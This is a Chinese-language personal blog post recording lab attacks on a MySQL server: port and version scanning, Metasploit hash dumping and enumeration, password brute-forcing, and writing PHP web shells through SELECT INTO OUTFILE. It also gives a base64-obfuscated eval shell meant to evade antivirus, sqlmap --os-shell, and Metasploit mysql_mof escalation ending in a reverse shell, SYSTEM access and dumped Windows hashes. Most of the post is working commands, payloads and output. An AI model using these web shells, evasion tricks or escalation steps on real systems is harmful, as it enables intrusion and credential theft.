信息收集 端口信息收集 使用nmap,一般mysql都是3306端口。也可能存在自定义的端口,因此用nmap扫描端口以及开放的服务是有必要的。
1 2 3 4 5 6 7 8 9 10 11 nmap -p 3306 172.16.1.100 Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-07 19:03 CST Nmap scan report for bogon (172.16.1.100) Host is up (0.00029s latency). PORT STATE SERVICE 3306/tcp open mysql MAC Address: 1A:5B:1E:39:86:0E (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
版本信息收集 做安全,对版本要求还是跟高的,细微的版本差异有可能使得payload就打不穿了。
当存在明显注入的时候,可以使用内置函数
1 2 select version(); select @@version();
或者使用sqlmap
1 sqlmap.py -u url --dbms mysql
当phpmyadmin管理页面存在弱密码,比如root/root登陆成功后,查看localhost->变量->服务器变量和设置中的version参数值。
使用msf扫描信息,前提是mysql开启了远程连接的权限,本地复现在数据库里加上这个
1 2 3 use select user,host from user; GRANT ALL PRIVILEGES ON *.* TO 'root'@'172.16.1.105' IDENTIFIED BY 'root' WITH GRANT OPTION;
再使用msf的auxiliary/scanner/mysql/mysql_version 模块进行扫描
1 2 3 4 5 auxiliary/scanner/mysql/mysql_version # msf auxiliary(scanner/mysql/mysql_version) > run [+] 172.16.1.100:3306 - 172.16.1.100:3306 is running MySQL 5.5.53 (protocol 10) [*] Scanned 1 of 1 hosts (100% complete)
msf信息收集模块 msf这个东西不是一般的变态,和mysql相关的模块可以使用search mysql来查询
hash枚举
1 2 3 4 5 6 7 8 sf auxiliary(scanner/mysql/mysql_hashdump) > set password root password => root msf auxiliary(scanner/mysql/mysql_hashdump) > run [+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D**4A6CD4A731AEBFB6A**09E1B [+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407**84A6CD4A731AEBFB6AF**9E1B [+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D***A6CD4A731AEB**6AF209E1B [+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D***A6CD4A731AEBFB6AF209E**
获取相关信息:获取数据库版本,操作系统名称,架构,数据库目录,数据库用户以及密码哈希值。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 msf auxiliary(admin/mysql/mysql_enum) > set username root username => root msf auxiliary(admin/mysql/mysql_enum) > set password root password => root msf auxiliary(admin/mysql/mysql_enum) > run [*] 172.16 .1 .100 :3306 - Running MySQL Enumerator... [*] 172.16 .1 .100 :3306 - Enumerating Parameters [*] 172.16 .1 .100 :3306 - MySQL Version: 5.5 .53 [*] 172.16 .1 .100 :3306 - Compiled for the following OS: Win32 [*] 172.16 .1 .100 :3306 - Architecture: AMD64 [*] 172.16 .1 .100 :3306 - Server Hostname: CHINA-20190124 J [*] 172.16 .1 .100 :3306 - Data Directory: D:\phpstudy\PHPTutorial\MySQL\data\ [*] 172.16 .1 .100 :3306 - Logging of queries and logins: OFF [*] 172.16 .1 .100 :3306 - Old Password Hashing Algorith
这都建立在已经知道数据库名字和密码的前提下,有点后渗透的意味了。
mysql密码爆破 使用phpMyAdmin多线程爆破工具。
1 下载:https://portswigger.net/burp/、http://pan.baidu.com/s/1c1LD6co
使用msf爆破
还可以使用字典进行扫描
1 2 3 4 5 use auxiliary/scanner/mysql/mysql_login set RHOSTS 192.168.157.1-254 set pass_file /tmp/password.txt set username root run
使用nmap爆破mysql密码
1 nmap --script=mysql-brute 172.16.1.100
其实爆破还是蛮鸡肋的,也算一种方法吧。
通过mysql写shell 到处一句话木马文件,前提是要有写入的权限,并且知道网站的绝对路径,以及–secure-file-priv参数运行到处到任意目录
1 2 3 4 5 select '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'D:/work/WWW/shell.php' select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php' SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php' ;
绕过杀毒,先在上传点上传shell.jpg。此时这个文件由于不是php后缀无法解析
1 <?php $a=' PD9waHAgQGV2YWwoJF9QT1NUWydhbnRpYW4zNjUnXSk7ZGllKCk7Pz4=' ;error_reporting(0 );@set_time_limit(0 );eval ("?>" .base64_decode($a));?>
再在数据库里写出一个包含文件,是的shell得到解析
1 select '<?php include ' shell.jpg' ?>' INTO OUTFILE 'D:/work/WWW/shell.php'
使用sqlmap写shell
1 2 sqlmap -u url--os-shell echo "<?php @eval($_POST['c']);?>" >/data/www/1. php
mysql提权 使用msf中的mof模块 windows/mysql/mysql_mof
没成功。。。很明显被–secure-file-priv这个参数给阻止了。由于。。是物理机作为靶机,就先简单试试。之后再拿虚拟机复现
1 2 3 4 5 6 7 8 9 [*] Started reverse TCP handler on 172.16.1.105:4444 [*] 172.16.1.100:3306 - Attempting to login as 'root:root' [*] 172.16.1.100:3306 - Uploading to 'C:/windows/system32/mVvkv.exe' [-] 172.16.1.100:3306 - MySQL Error: RbMysql::OptionPreventsStatement The MySQL server is running with the --secure-file-priv option so it cannot execute this statement [*] 172.16.1.100:3306 - Uploading to 'C:/windows/system32/wbem/mof/thrBL.mof' [-] 172.16.1.100:3306 - MySQL Error: RbMysql::OptionPreventsStatement The MySQL server is running with the --secure-file-priv option so it cannot execute this statement [!] 172.16.1.100:3306 - This exploit may require manual cleanup of 'mVvkv.exe' on the target [!] 172.16.1.100:3306 - This exploit may require manual cleanup of 'wbem\mof\good\thrBL.mof' on the target [*] Exploit completed, but no session was created.
前提:
1 2 3 4 5 6 7 8 要是能够通过网页连接管理(phpmyadmin),则可以修改host为%并刷新权限后,则可以通过msf等工具远程连接数据库。默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置。 use mysql; update user set host = '%' where user = 'root'; FLUSH PRIVILEGES ; select host, user from user; # unblock with 'mysqladmin flush-hosts' 在数据库里执行 flush privileges; 就可以解决
关于提权部分,留坑。。配置一台虚拟机以后再试试。
3/14更新 使用msf的mysql_ mof对windows server 2003反弹shell成功
1 2 3 4 5 6 7 8 9 10 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:c7562a9f398996e704da7a1ff47c554c::: C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>
Author:
zhhhy
Permalink:
http://yoursite.com/2019/03/12/myhack-sql/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Solgan:
Do you believe in DESTINY?